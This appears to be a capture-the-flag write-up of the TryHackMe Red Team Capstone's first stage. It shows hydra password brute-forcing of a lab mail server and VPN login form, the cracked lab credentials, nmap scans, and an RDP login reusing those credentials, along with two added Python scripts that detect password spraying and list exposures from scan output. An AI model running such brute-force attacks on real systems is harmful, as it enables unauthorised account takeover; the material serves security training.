# Perimeter Breach

To breach the perimeter, we target the public-facing VPN server. Given its connection to the internal network, it presents a prime opportunity for initial exploitation.

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone/Capstone_Challenge_Resources]
└─$ hydra -L usernames.txt -P passwords.txt mail.thereserve.loc smtp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:10:10
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10800 login tries (l:15/p:720), ~675 tries per task
[DATA] attacking smtp://mail.thereserve.loc:25/
[STATUS] 986.00 tries/min, 986 tries in 00:01h, 9814 to do in 00:10h, 16 active
[STATUS] 1009.67 tries/min, 3029 tries in 00:03h, 7771 to do in 00:08h, 16 active
[25][smtp] host: mail.thereserve.loc   login: laura.wood@corp.thereserve.loc   password: Password1@
[STATUS] 1109.14 tries/min, 7764 tries in 00:07h, 3036 to do in 00:03h, 16 active
[25][smtp] host: mail.thereserve.loc   login: mohammad.ahmed@corp.thereserve.loc   password: Password1!
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:19:33
```

{% endcode %}

<figure><img src="/files/IGqf5MN31qNhXlroghNU" alt=""><figcaption></figcaption></figure>

We can reuse the same username and password lists to perform a brute-force attack on the VPN login as well.

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone/Capstone_Challenge_Resources]
└─$ hydra -L usernames.txt -P passwords.txt vpn.thereserve.loc http-get-form "/login.php:user=^USER^&password=^PASS^:Please check your username or password" -v                
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:10:02
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10800 login tries (l:15/p:720), ~675 tries per task
[DATA] attacking http-get-form://vpn.thereserve.loc:80/login.php:user=^USER^&password=^PASS^:Please check your username or password
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[STATUS] 944.00 tries/min, 944 tries in 00:01h, 9856 to do in 00:11h, 16 active
[STATUS] 964.67 tries/min, 2894 tries in 00:03h, 7906 to do in 00:09h, 16 active
[VERBOSE] Page redirected to http[s]://vpn.thereserve.loc:80/vpncontrol.php
[80][http-get-form] host: vpn.thereserve.loc   login: laura.wood@corp.thereserve.loc   password: Password1@
[STATUS] 1058.43 tries/min, 7409 tries in 00:07h, 3391 to do in 00:04h, 16 active
[VERBOSE] Page redirected to http[s]://vpn.thereserve.loc:80/vpncontrol.php
[80][http-get-form] host: vpn.thereserve.loc   login: mohammad.ahmed@corp.thereserve.loc   password: Password1!
[STATUS] attack finished for vpn.thereserve.loc (waiting for children to complete tests)
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:19:52
```

{% endcode %}

<figure><img src="/files/hyCWqGgHfai44XFIljle" alt=""><figcaption></figcaption></figure>
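From the defender's side, the two Hydra runs above have a distinctive signature: a single source sending roughly 1,000 login attempts per minute across 15 accounts (`l:15/p:720`), with a success buried among the failures. The Python script below is an added example, not part of the original writeup, showing a simple sliding-window detector over authentication logs for exactly that pattern. The log format, source addresses and account names are constructed for the example, and the thresholds are assumptions to be tuned per environment.

```python
"""Sliding-window brute-force / password-spray detector for authentication logs.

Added example (not from the original writeup). The log format below is
constructed for illustration: "<ISO timestamp> <service> <src_ip> <user> <result>".
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_THRESHOLD = 20   # assumed: failed logins from one source inside the window
USER_THRESHOLD = 5    # assumed: distinct accounts tried from one source (spray signature)
WINDOW = timedelta(minutes=1)


def parse_line(line):
    """Split one constructed log line into (timestamp, service, src_ip, user, result)."""
    ts, service, src, user, result = line.split()
    return datetime.fromisoformat(ts), service, src, user, result


def detect(lines):
    """Return {src_ip: finding} for every source that exceeds a threshold
    within any one-minute window. Events are processed in time order; a
    per-source deque holds the failures still inside the window."""
    events = sorted((parse_line(ln) for ln in lines if ln.strip()), key=lambda e: e[0])
    window = defaultdict(deque)   # src_ip -> deque of (timestamp, user) failures
    findings = {}
    for ts, service, src, user, result in events:
        if result == "OK":
            # A success from a source already flagged is the highest-value alert:
            # the attacker found a working password.
            if src in findings:
                findings[src]["success_after_burst"].append(user)
            continue
        q = window[src]
        q.append((ts, user))
        while q and ts - q[0][0] > WINDOW:
            q.popleft()
        users = {u for _, u in q}
        if len(q) >= FAIL_THRESHOLD or len(users) >= USER_THRESHOLD:
            f = findings.setdefault(
                src, {"max_failures": 0, "max_users": 0, "success_after_burst": []})
            f["max_failures"] = max(f["max_failures"], len(q))
            f["max_users"] = max(f["max_users"], len(users))
    return findings


def build_sample():
    """Constructed sample: one source spraying 15 accounts x 30 passwords at
    ~1000 tries/min (the rate in the Hydra output above) and hitting one valid
    password, plus a normal user who mistypes twice and then logs in."""
    base = datetime(2024, 11, 12, 13, 10, 0)
    users = [f"user{i:02d}@corp.thereserve.loc" for i in range(15)]
    lines = []
    n = 0
    for pw_round in range(30):
        for u in users:
            t = base + timedelta(seconds=n * 0.06)   # one attempt every 60 ms
            result = "OK" if (pw_round == 29 and u == users[3]) else "FAIL"
            lines.append(f"{t.isoformat()} smtp 10.50.50.5 {u} {result}")
            n += 1
    benign = base + timedelta(minutes=5)
    for i, r in enumerate(["FAIL", "FAIL", "OK"]):
        t = benign + timedelta(seconds=20 * i)
        lines.append(f"{t.isoformat()} smtp 10.60.1.7 sam.user@corp.thereserve.loc {r}")
    return lines


if __name__ == "__main__":
    for src, finding in detect(build_sample()).items():
        print(src, finding)
```

The spray source trips the distinct-user threshold within its first second and is reported with the account whose password was found; the benign source, with two failures for one account, never appears. Account lockout alone would not stop the spray, since each account sees only one attempt per password round, which is why the per-source view matters.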

## Breach

With these accounts, we can attempt to log into the webmail application and the VPN server (to obtain the VPN configuration files assigned to the users), and, if fortunate, the same credentials may also be valid **Active Directory** credentials. Ignoring the potential MySQL vulnerabilities for now, we focus on the webmail login.

After successfully logging into both accounts, we find that, unfortunately, nothing useful is located in the mailboxes.

<figure><img src="/files/2DkbkjmTd1GQf6uyBcis" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/Q4AHBKPcesqEMUNVfoHI" alt=""><figcaption></figcaption></figure>

Upon examining the VPN server, we successfully log in and retrieve two `.ovpn` files. The form prompts us to submit an account name; on login, it is pre-filled with `laura.wood@corp.thereserve.loc`. Testing with my own name in the same format also works successfully.

At the start of the challenge, on the first attempt, the VPN routes were configured correctly, allowing us to reach the internal network IPs `10.200.XXX.21` and `10.200.XXX.22`, both of which are `WRK` machines within the internal network.

## WRKX Recon (10.200.XXX.21, 10.200.XXX.22)

Scanning both hosts reveals FQDNs of the form `WRK_.corp.thereserve.loc` (`WRK1` and `WRK2`) and an open `RDP` port (`3389`).

Both machines exposing `RDP` is notable: the `rdp-ntlm-info` output shows they are joined to the `CORP` domain, so if the credentials recovered above are also valid `Active Directory` accounts, they may allow an RDP login.

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV -Pn 10.200.118.21 -T4     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 13:27 IST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.80% done
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 3.45% done; ETC: 13:29 (0:01:52 remaining)
Nmap scan report for 10.200.118.21
Host is up (0.36s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 21:78:e2:79:d3:93:ee:f9:aa:70:94:ec:01:b3:a5:8f (RSA)
|   256 e0:f7:b6:67:c9:93:b5:74:0f:0a:83:ff:ef:55:c8:9a (ECDSA)
|_  256 bd:83:0c:e3:b4:4f:78:f2:e3:4a:52:03:3c:a5:ce:58 (ED25519)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-11-12T07:59:32+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=WRK1.corp.thereserve.loc
| Not valid before: 2024-11-06T10:50:27
|_Not valid after:  2025-05-08T10:50:27
| rdp-ntlm-info: 
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: WRK1
|   DNS_Domain_Name: corp.thereserve.loc
|   DNS_Computer_Name: WRK1.corp.thereserve.loc
|   DNS_Tree_Name: thereserve.loc
|   Product_Version: 10.0.17763
|_  System_Time: 2024-11-12T07:58:54+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-12T07:58:56
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
```

{% endcode %}

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV -Pn 10.200.118.22 -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 14:16 IST
Nmap scan report for 10.200.118.22
Host is up (0.38s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 e6:f0:fb:5b:24:28:68:13:da:dd:c5:5f:67:4e:be:4f (RSA)
|   256 93:f5:8f:4c:31:15:fc:8e:38:03:3e:d5:b7:1c:ed:d3 (ECDSA)
|_  256 56:3f:8a:33:a4:1f:dc:11:9a:a1:67:a6:7d:f8:76:18 (ED25519)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WRK2.corp.thereserve.loc
| Not valid before: 2024-11-06T10:50:34
|_Not valid after:  2025-05-08T10:50:34
|_ssl-date: 2024-11-12T08:48:10+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: WRK2
|   DNS_Domain_Name: corp.thereserve.loc
|   DNS_Computer_Name: WRK2.corp.thereserve.loc
|   DNS_Tree_Name: thereserve.loc
|   Product_Version: 10.0.17763
|_  System_Time: 2024-11-12T08:47:31+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-11-12T08:47:32
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.49 seconds
```

{% endcode %}

## Internal Network Recon

Let's attempt to find other hosts with RDP enabled on the network by using Nmap with the following command:

```bash
nmap -p 3389 -Pn 10.200.XXX.1-254 --open
```

Replace `XXX` with the appropriate subnet. This command will help us identify any other machines with **RDP (port 3389)** open.

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -p 3389 -Pn 10.200.118.1-254 --open
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 14:22 IST
Nmap scan report for mail.thereserve.loc (10.200.118.11)
Host is up (0.27s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap scan report for 10.200.118.21
Host is up (0.27s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap scan report for 10.200.118.101
Host is up (0.27s latency).

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap done: 254 IP addresses (254 hosts up) scanned in 8.42 seconds
```

{% endcode %}

Let's attempt to find other hosts with HTTP enabled on the network by using Nmap with the following command:

{% code overflow="wrap" %}

```bash
nmap -p 80,443 -Pn 10.200.XXX.1-254 --open
```

{% endcode %}

Replace `XXX` with the appropriate subnet. This command will help us identify any other machines with **HTTP/HTTPS (ports 80 and 443)** open.

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -p 80,443 -Pn 10.200.118.1-254 --open
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 14:23 IST
Stats: 0:00:11 elapsed; 0 hosts completed (254 up), 254 undergoing Connect Scan
Connect Scan Timing: About 11.22% done; ETC: 14:24 (0:01:27 remaining)
Nmap scan report for mail.thereserve.loc (10.200.118.11)
Host is up (0.30s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for vpn.thereserve.loc (10.200.118.12)
Host is up (0.31s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for web.thereserve.loc (10.200.118.13)
Host is up (0.19s latency).
Not shown: 1 closed tcp port (conn-refused)
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 10.200.118.201
Host is up (0.17s latency).

PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 254 IP addresses (254 hosts up) scanned in 27.00 seconds
```

{% endcode %}

After the scan, we identify a fourth machine with ports **80** and **443** exposed, serving an **HTTP/HTTPS** web page. When accessing the IP in the browser, the page loads with a white background, displaying no content or errors.

<figure><img src="/files/rQZrQiddxmesE8fQv2a0" alt=""><figcaption></figcaption></figure>

By checking the source code, we discover that the web page is associated with the **Swift Bank** web application, as indicated by the static links present in the JavaScript code.

<figure><img src="/files/YkivoDlB6oEblGnNUxca" alt=""><figcaption></figcaption></figure>

After adding the hostname `swift.bank.thereserve.loc` to the hosts file, we can now successfully access the **Swift Bank** web application.

<figure><img src="/files/snE0p6gSjyqVlIlvWyiH" alt=""><figcaption></figcaption></figure>

We can also run an Nmap scan against the **Swift Bank** web application to identify any open ports and services that might be exposed.

{% code overflow="wrap" %}

```bash
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]
└─$ nmap -sC -sV swift.bank.thereserve.loc -T4  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 15:29 IST
Nmap scan report for swift.bank.thereserve.loc (10.200.118.201)
Host is up (0.31s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 1f:42:2d:f5:4d:c6:fa:41:b1:d9:42:5b:d2:b4:bd:2e (RSA)
|   256 7f:64:d1:9d:6a:5a:a6:6f:c1:85:ff:7a:ae:d0:39:ef (ECDSA)
|_  256 b6:e5:97:2f:47:5d:24:2c:51:84:f0:ea:69:df:58:47 (ED25519)
80/tcp  open  http      nginx 1.18.0 (Ubuntu)
|_http-title: The Reserve Online
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/https
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/stateOrProvinceName=Utah/countryName=US
| Not valid before: 2022-09-26T13:22:15
|_Not valid after:  2023-09-26T13:22:15
| tls-alpn: 
|   h2
|_  http/1.1
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain; charset=utf-8
|     Vary: Origin
|     X-Content-Type-Options: nosniff
|     Date: Tue, 12 Nov 2024 09:59:40 GMT
|     Content-Length: 19
|     page not found
|   GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain; charset=utf-8
|     Vary: Origin
|     X-Content-Type-Options: nosniff
|     Date: Tue, 12 Nov 2024 09:59:36 GMT
|     Content-Length: 19
|     page not found
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/plain; charset=utf-8
|     Vary: Origin
|     X-Content-Type-Options: nosniff
|     Date: Tue, 12 Nov 2024 09:59:38 GMT
|     Content-Length: 19
|_    page not found
|_http-cors: GET POST DELETE OPTIONS
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port443-TCP:V=7.94SVN%T=SSL%I=7%D=11/12%Time=67332708%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-O
SF:ptions:\x20nosniff\r\nDate:\x20Tue,\x2012\x20Nov\x202024\x2009:59:36\x2
SF:0GMT\r\nContent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(
SF:HTTPOptions,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-Options
SF::\x20nosniff\r\nDate:\x20Tue,\x2012\x20Nov\x202024\x2009:59:38\x20GMT\r
SF:\nContent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(FourOh
SF:FourRequest,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-Options
SF::\x20nosniff\r\nDate:\x20Tue,\x2012\x20Nov\x202024\x2009:59:40\x20GMT\r
SF:\nContent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(Generi
SF:cLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent
SF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4
SF:00\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
SF:nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\
SF:r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20
SF:Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConn
SF:ection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,
SF:67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\
SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")
SF:%r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r
SF:\n\r\n400\x20Bad\x20Request")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnectio
SF:n:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.31 seconds
```

{% endcode %}
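The WRK1/WRK2 scans and the Swift Bank scan above carry several findings a blue team would want to track as exposures rather than read once and discard: RDP reachable on workstations, SMB message signing enabled but not required, and, on `swift.bank.thereserve.loc`, a TLS certificate that expired in September 2023, more than a year before the scan date. The Python script below is an added example, not part of the original writeup, that parses Nmap's normal output format into per-host exposure findings. Its input is an abridged excerpt of the scans on this page; the rule that hosts named `WRK*` are workstations is an assumption taken from this environment's naming.

```python
"""Turn Nmap normal-format output into per-host exposure findings.

Added example (not from the original writeup). SAMPLE_NMAP is an abridged
excerpt of the scans on this page; the WRK* workstation-naming rule is an
assumption specific to this environment.
"""
import re
from datetime import datetime

SAMPLE_NMAP = """\
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 13:27 IST
Nmap scan report for 10.200.118.21
Host is up (0.36s latency).
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WRK1.corp.thereserve.loc
| Not valid before: 2024-11-06T10:50:27
|_Not valid after:  2025-05-08T10:50:27
| rdp-ntlm-info:
|   NetBIOS_Computer_Name: WRK1
|   DNS_Domain_Name: corp.thereserve.loc
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 15:29 IST
Nmap scan report for swift.bank.thereserve.loc (10.200.118.201)
Host is up (0.31s latency).
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http      nginx 1.18.0 (Ubuntu)
443/tcp open  ssl/https
| ssl-cert: Subject: commonName=localhost/stateOrProvinceName=Utah/countryName=US
| Not valid before: 2022-09-26T13:22:15
|_Not valid after:  2023-09-26T13:22:15
"""

START_RE = re.compile(r"^Starting Nmap .* at (\d{4}-\d{2}-\d{2})")
HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\S+)\))?")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)")
NOT_AFTER_RE = re.compile(r"^\|_?\s*Not valid after:\s+(\S+)")
NETBIOS_RE = re.compile(r"^\|\s+NetBIOS_Computer_Name:\s+(\S+)")


def parse_nmap(text):
    """Parse normal-format output into a list of host dicts. The last
    certificate seen for a host wins if several ports present one."""
    hosts, scan_date, cur = [], None, None
    for line in text.splitlines():
        m = START_RE.match(line)
        if m:
            scan_date = datetime.strptime(m.group(1), "%Y-%m-%d")
            continue
        m = HOST_RE.match(line)
        if m:
            cur = {"host": m.group(1), "ip": m.group(2) or m.group(1),
                   "scan_date": scan_date, "open_ports": {},
                   "smb_signing_required": None, "cert_not_after": None,
                   "netbios_name": None}
            hosts.append(cur)
            continue
        if cur is None:
            continue
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            cur["open_ports"][int(m.group(1))] = m.group(4)
            continue
        m = NOT_AFTER_RE.match(line)
        if m:
            cur["cert_not_after"] = datetime.fromisoformat(m.group(1))
            continue
        if "Message signing enabled but not required" in line:
            cur["smb_signing_required"] = False
        elif "Message signing enabled and required" in line:
            cur["smb_signing_required"] = True
        m = NETBIOS_RE.match(line)
        if m:
            cur["netbios_name"] = m.group(1)
    return hosts


def assess(host):
    """Return the exposure findings for one parsed host."""
    findings = []
    if 3389 in host["open_ports"]:
        findings.append("rdp-exposed")
        # Assumption for this environment: NetBIOS names WRK* are workstations,
        # where RDP exposure plus shared domain credentials is the larger risk.
        if host["netbios_name"] and host["netbios_name"].upper().startswith("WRK"):
            findings.append("rdp-on-workstation")
    if host["smb_signing_required"] is False:
        findings.append("smb-signing-not-required")
    if host["cert_not_after"] and host["scan_date"] and host["cert_not_after"] < host["scan_date"]:
        findings.append("tls-cert-expired")
    return findings


def report(text):
    """Map each scanned IP to its findings."""
    return {h["ip"]: assess(h) for h in parse_nmap(text)}


if __name__ == "__main__":
    for ip, findings in report(SAMPLE_NMAP).items():
        print(ip, findings or ["no findings"])
```

Running the same parser over a full `/24` sweep gives an inventory to drive remediation: restrict RDP on workstations to management networks or a gateway, require SMB signing by policy, and renew the expired certificate.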

It seems that, for now, we are unable to do much with the application, as only ports `22`, `80`, and `443` are available.

By using `Remmina` and reusing the credentials of `laura.wood`, we successfully establish a connection to the `WRK1` machine.

<figure><img src="/files/WzlQUB4WprUCle9WsBBF" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5BoS67U0iQquniq0EKX2" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/mRCw2ZKDjg2LrVL3vQKL" alt=""><figcaption></figcaption></figure>

## Flags 1 - 3

{% hint style="info" %}
**NOTE**: We are now able to obtain the following flags by following the instructions on the e-citizen platform:

* **Flag 1**: Breaching the Perimeter
* **Flag 2**: Breaching Active Directory
* **Flag 3**: Foothold on Corporate Division Tier 2 Infrastructure
{% endhint %}
